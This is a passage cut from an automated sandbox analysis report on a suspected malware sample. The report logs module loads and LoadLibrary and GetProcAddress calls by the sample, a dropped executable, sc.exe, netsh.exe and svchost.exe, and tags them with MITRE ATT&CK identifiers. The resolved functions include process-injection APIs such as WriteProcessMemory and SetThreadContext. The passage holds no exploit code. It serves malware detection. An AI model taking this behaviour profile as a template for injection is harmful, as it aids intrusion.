\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"SECUR32.DLL\" at base 74d30000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75210000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74ea0000\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 772f0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77290000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f10000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 76b60000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"RPCRT4.DLL\" at base 76800000\n \"dqczsfku.exe\" loaded module \"GDI32.DLL\" at base 772f0000\n \"dqczsfku.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77290000\n \"dqczsfku.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f10000\n \"dqczsfku.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dqczsfku.exe\" loaded module \"KERNEL32\" at base 76b60000\n \"dqczsfku.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dqczsfku.exe\" loaded module \"KERNEL32.DLL\" at base 76b60000\n \"dqczsfku.exe\" loaded module \"WS2_32.DLL\" at base 772b0000\n \"dqczsfku.exe\" loaded module \"DBGHELP.DLL\" at base 6f830000\n \"dqczsfku.exe\" loaded module \"USER32.DLL\" at base 76910000\n \"dqczsfku.exe\" loaded module \"ADVAPI32.DLL\" at base 76a10000\n \"dqczsfku.exe\" loaded module \"SHELL32.DLL\" at base 75bb0000\n \"dqczsfku.exe\" loaded module \"OLEAUT32.DLL\" at base 76d10000\n \"dqczsfku.exe\" loaded module \"MSVCR100.DLL\" at base 69bf0000\n \"dqczsfku.exe\" loaded module \"SSPICLI.DLL\" at base 74e80000\n \"dqczsfku.exe\" loaded module \"RPCRT4.DLL\" at base 76800000\n \"dqczsfku.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77240000\n \"dqczsfku.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74ea0000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6cd60000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6d5d0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 76b60000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6c410000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6b8c0000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 69640000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b60000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6b8f0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 69610000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6b720000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6b350000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6b300000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 69bd0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 69530000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 68230000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 76800000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 68110000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6b2f0000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 68010000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 67ec0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 67fc0000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 64eb0000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 75900000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 74ef0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e50000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74a00000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 76910000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 76db0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c420000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 76a10000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77240000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77240000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77240000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77240000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74790000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74f90000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6f950000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75050000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 745d0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 746d0000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 76d10000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73350000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 76800000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73260000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73680000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73000000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77240000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 72fa0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 749c0000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74880000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 72f90000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 772b0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 732c0000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 70720000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 74e80000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77240000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74520000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004680)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005144)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005144)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005144)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005144)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005144)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005144)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005184)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005184)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00002988)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002988)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002988)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002988)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002988)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004680)\n 